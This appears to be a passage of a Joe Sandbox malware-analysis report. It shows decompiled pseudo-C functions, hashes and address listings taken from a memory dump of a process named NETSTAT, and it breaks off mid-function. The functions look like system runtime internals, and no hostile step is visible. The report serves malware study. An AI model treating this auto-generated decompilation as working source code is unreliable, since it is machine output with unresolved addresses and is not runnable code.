                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                • Instruction ID: 02c183f9cfe64846c1ede602a9459de0ae8bbca5212bf558d387dbf764bd0e3d
                • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                • Instruction Fuzzy Hash: 33516D71600606EFDB65CF14C480A56FFB9FF49304F59C1AAE908AF212E771E986CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03382990 Relevance: .1, Instructions: 133COMMON
                Download Yara Rule
                C-Code - Quality: 97%
                			E03382990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x342ff00);
				E033AD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x3331664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0339E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x3331668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E033D51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x333166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E03382AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E03366600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E03382C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0336EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E03382AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E03382C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E03382ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E033AD0D1(_t62);
				goto L28;
			}





















                0x03382990
                0x03382992
                0x03382997
                0x033829a3
                0x033829a6
                0x033829ab
                0x033829ad
                0x033829b2
                0x033c5c80
                0x033829b8
                0x033829b8
                0x033829bb
                0x033829c0
                0x033829c5
                0x033829c6
                0x033829c6
                0x033829cb
                0x00000000
                0x00000000
                0x033829cd
                0x033829d0
                0x033829d9
                0x033829db
                0x033829dd
                0x03382a7f
                0x03382a84
                0x03382a87
                0x03382a89
                0x033c5ca1
                0x033c5ca3
                0x00000000
                0x03382a8f
                0x03382a8f
                0x00000000
                0x03382a8f
                0x00000000
                0x033829e3
                0x033829e3
                0x033829e3
                0x00000000
                0x033829e3
                0x033829dd
                0x00000000
                0x033829db
                0x033829e6
                0x033829e9
                0x033829eb
                0x033829ed
                0x033829f3
                0x033829f5
                0x033829f8
                0x033829fa
                0x03382a97
                0x03382a9a
                0x03382a9d
                0x03382add
                0x00000000
                0x03382a9f
                0x03382aa2
                0x03382aa5
                0x03382aa8
                0x03382aab
                0x033c5cab
                0x033c5caf
                0x033c5cc5
                0x033c5cda
                0x033c5cdc
                0x033c5cdf
                0x033c5ce5
                0x00000000
                0x033c5ceb
                0x033c5ced
                0x033c5cee
                0x00000000
                0x033c5cee
                0x033c5cb1
                0x033c5cb4
                0x033c5cb9
                0x033c5cbb
                0x00000000
                0x033c5cbd
                0x033c5cbd
                0x00000000
                0x033c5cbd
                0x033c5cbb
                0x03382ab1
                0x03382ab1
                0x03382ac4
                0x03382ac6
                0x03382ac6
                0x00000000
                0x03382ac6
                0x03382aab
                0x00000000
                0x03382a00
                0x03382a09
                0x03382a0e
                0x03382a21
                0x03382a24
                0x03382a35
                0x03382a3a
                0x03382a3d
                0x03382a42
                0x03382a59
                0x03382a59
                0x03382a5c
                0x03382a5f
                0x03382a5f
                0x033829fa
                0x033829f3
                0x03382a64
                0x03382a64
                0x03382a6b
                0x03382a6b
                0x03382a6d
                0x03382a72
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fed7ecd6950a086ee314aa54de8bfbca1213446e0b5b7fc1019a704cc2b3329e
                • Instruction ID: e6fc4e1427b12621f74791ae29980edfc522e7d07a02de88d3f8778658bdd580
                • Opcode Fuzzy Hash: fed7ecd6950a086ee314aa54de8bfbca1213446e0b5b7fc1019a704cc2b3329e
                • Instruction Fuzzy Hash: DD513575A00319DFDF25EF95C880ADEBBB9BF48710F148459E814AB260C7399D52CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03384BAD Relevance: .1, Instructions: 131COMMON
                Download Yara Rule
                C-Code - Quality: 85%
                			E03384BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x344d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0335CC50(_t86);
					L11:
					return E0339B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x3448504
				E03372280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0339FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0339B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L03374620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0335CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x3448504
								E0336FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E03384F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                0x03384bad
                0x03384bbf
                0x03384bc2
                0x03384bc6
                0x03384bcd
                0x03384bd9
                0x033c67fe
                0x033c6800
                0x03384ccc
                0x03384ccd
                0x03384cb7
                0x03384cc9
                0x03384cc9
                0x03384bdf
                0x03384be5
                0x00000000
                0x00000000
                0x03384beb
                0x03384bef
                0x00000000
                0x00000000
                0x03384bf5
                0x03384bf9
                0x03384c06
                0x03384c0b
                0x03384c17
                0x03384c1c
                0x03384c1f
                0x03384c25
                0x03384c33
                0x03384c3d
                0x03384c40
                0x03384c43
                0x03384c47
                0x03384c4d
                0x03384c53
                0x03384c54
                0x03384c55
                0x03384c56
                0x03384c5b
                0x03384c5c
                0x03384c63
                0x03384c6b
                0x00000000
                0x00000000
                0x033c6776
                0x033c6784
                0x033c6784
                0x033c679f
                0x033c67a7
                0x033c67af
                0x033c67ce
                0x00000000
                0x033c67b1
                0x033c67b7
                0x033c67b8
                0x033c67c1
                0x033c67d3
                0x033c67d9
                0x033c67dd
                0x03384c94
                0x03384c94
                0x03384c98
                0x03384c9c
                0x03384ca3
                0x033c67f4
                0x033c67f4
                0x03384cb5
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x03384cb5
                0x03384c79
                0x03384c7e
                0x03384c89
                0x03384c8b
                0x03384c8f
                0x03384c8f
                0x00000000
                0x03384c89
                0x033c67c3
                0x00000000
                0x033c67c3
                0x033c67af
                0x03384c73
                0x00000000
                0x00000000
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 837f2510e84cc2712bec5fd00292398a4b976d21c568324a2a4e42de09475c5d
                • Instruction ID: 165293e28c1054ca1b4cca17d551ba5e39a64fae568ba7471369dc650121d872
                • Opcode Fuzzy Hash: 837f2510e84cc2712bec5fd00292398a4b976d21c568324a2a4e42de09475c5d
                • Instruction Fuzzy Hash: DF41A435E40369ABCB30EF65CD81BEAB7B8EF45700F0504A9E908AB641D774DE85CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03384D3B Relevance: .1, Instructions: 131COMMON
                Download Yara Rule
                C-Code - Quality: 78%
                			E03384D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x344d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0339FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x3447bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0339B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L03374620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0335CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0339B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0339F380(_t67 + 0xc, 0x3335138, 0x10) == 0) {
								 *0x34460d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E03384F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E03384E70(0x34486b0, 0x3385690, 0, 0) != 0) {
					_t46 = E0335CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                0x03384d3b
                0x03384d4d
                0x03384d53
                0x03384d58
                0x03384d65
                0x03384d6c
                0x03384d71
                0x03384d77
                0x03384d7f
                0x03384d8c
                0x03384d8e
                0x03384dad
                0x03384db0
                0x03384db7
                0x03384db8
                0x03384db9
                0x03384dba
                0x03384dbb
                0x03384dc1
                0x03384dc8
                0x03384dcc
                0x03384dd5
                0x03384dde
                0x03384ddf
                0x03384de0
                0x03384de1
                0x03384de6
                0x03384de7
                0x03384de9
                0x03384df3
                0x00000000
                0x00000000
                0x033c6c7c
                0x033c6c8a
                0x033c6c8a
                0x033c6c9d
                0x033c6ca7
                0x033c6cac
                0x033c6cb2
                0x033c6cb9
                0x00000000
                0x033c6cbf
                0x033c6cbf
                0x00000000
                0x033c6cbf
                0x033c6cb9
                0x03384dfb
                0x033c6ccf
                0x033c6cd3
                0x03384e32
                0x03384e39
                0x033c6ce0
                0x033c6cf2
                0x033c6cf2
                0x033c6ce0
                0x03384e3f
                0x03384e41
                0x03384e51
                0x03384e51
                0x03384e03
                0x03384e03
                0x03384e09
                0x03384e0f
                0x03384e57
                0x00000000
                0x00000000
                0x03384e1b
                0x03384e30
                0x03384e5b
                0x03384e5b
                0x00000000
                0x03384e30
                0x03384e11
                0x03384e11
                0x03384e16
                0x00000000
                0x03384e16
                0x03384e01
                0x00000000
                0x03384e01
                0x03384da5
                0x033c6c6b
                0x00000000
                0x03384dab
                0x03384dab
                0x00000000
                0x03384dab

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 98c75e024e78f0472afd7e38120283bf893fbb7077d56f0b79a9d722dccd3d07
                • Instruction ID: c03aa7e3098a4e18303822906e70dac667a9e3ba0e7da07620e5b8fc5c985b35
                • Opcode Fuzzy Hash: 98c75e024e78f0472afd7e38120283bf893fbb7077d56f0b79a9d722dccd3d07
                • Instruction Fuzzy Hash: 31413675A40318AFEB31EF15CCC0FAAB7A9EF45704F0840AAE8059BA81D774ED44CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03368A0A Relevance: .1, Instructions: 120COMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E03368A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x344d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0339B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0336E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x3331180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E03381DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E03393C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E03368999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                0x03368a0a
                0x03368a1c
                0x03368a23
                0x03368a2e
                0x03368a30
                0x03368a36
                0x03368a3c
                0x03368a3e
                0x03368a4a
                0x03368a52
                0x03368a9c
                0x03368aae
                0x03368a58
                0x03368a5e
                0x03368a6a
                0x03368a6f
                0x03368a75
                0x03368a7d
                0x03368a85
                0x03368a86
                0x03368a89
                0x03368a93
                0x03368a99
                0x03368a9b
                0x00000000
                0x03368aaf
                0x03368abe
                0x03368ac3
                0x03368acb
                0x03368ad7
                0x03368ae0
                0x03368af1
                0x00000000
                0x03368af1
                0x03368acd
                0x03368ad5
                0x03368afb
                0x03368afd
                0x03368aff
                0x03368b07
                0x03368b22
                0x03368b24
                0x03368b2a
                0x03368b2e
                0x03368b3f
                0x03368b78
                0x03368b41
                0x03368b52
                0x03368b54
                0x03368b5c
                0x03368b74
                0x03368b74
                0x03368b5c
                0x03368b3f
                0x03368b5e
                0x03368b61
                0x03368b64
                0x03368b64
                0x03368b6c
                0x03368b6c
                0x03368b11
                0x033b9cd5
                0x033b9cd5
                0x03368b17
                0x03368b1a
                0x03368b1a
                0x00000000
                0x03368ad5
                0x03368a89

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2427b403de678e19e8c90dea355e05a2729bcce8df50cb97a8e798192b1f46ea
                • Instruction ID: b559ff35675e2554f7c76e936a3942e78e7d70292dccf77c0b871ab3d26ec015
                • Opcode Fuzzy Hash: 2427b403de678e19e8c90dea355e05a2729bcce8df50cb97a8e798192b1f46ea
                • Instruction Fuzzy Hash: 454160B4A4032C9FDB24DF15CCC8AA9B7F8EB48300F1485EAD8199B255E7709E85CF50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0341FDE2 Relevance: .1, Instructions: 116COMMON
                Download Yara Rule
                C-Code - Quality: 76%
                			E0341FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0341FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E03420A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E03377D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E03411608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E03422B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0341C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0341DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E03377D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0341A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                0x0341fde7
                0x0341fde8
                0x0341fdec
                0x0341fdee
                0x0341fdf5
                0x0341fdf7
                0x0341fdfc
                0x0341fe19
                0x0341fe22
                0x0341fe26
                0x0341fec6
                0x0341fecd
                0x0341fed5
                0x0341fee7
                0x0341fed7
                0x0341fee0
                0x0341fee0
                0x0341feef
                0x0341ff00
                0x0341ff02
                0x0341ff07
                0x0341ff07
                0x00000000
                0x0341feef
                0x0341fe33
                0x0341fe55
                0x0341fe59
                0x0341fe5b
                0x0341fe5e
                0x0341fe69
                0x0341fe6d
                0x0341fe6d
                0x0341fe69
                0x0341fe35
                0x0341fe41
                0x0341fe41
                0x0341fe79
                0x0341fe8b
                0x0341fe7b
                0x0341fe84
                0x0341fe84
                0x0341fe93
                0x00000000
                0x0341fea8
                0x0341feba
                0x00000000
                0x0341feba
                0x0341fdfe
                0x0341fe01
                0x0341fe02
                0x0341fe08
                0x0341ff0c
                0x0341ff14
                0x0341ff14

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                • Instruction ID: f04c74b8e58efd2282b5b070e5a0aa4e17faa901d62b8ad13ae3c8ad91c8f1b4
                • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                • Instruction Fuzzy Hash: DD31F536200F406FD731DB69C884F6BBBAAEB85250F18425BE9468F741DA74D866C718
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033D69A6 Relevance: .1, Instructions: 108COMMON
                Download Yara Rule
                C-Code - Quality: 69%
                			E033D69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x344d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L03366C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E033D6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E03399980() >= 0) {
							E03372280(_t56, 0x3448778);
							_t77 = 1;
							_t68 = 1;
							if( *0x3448774 == 0) {
								asm("cdq");
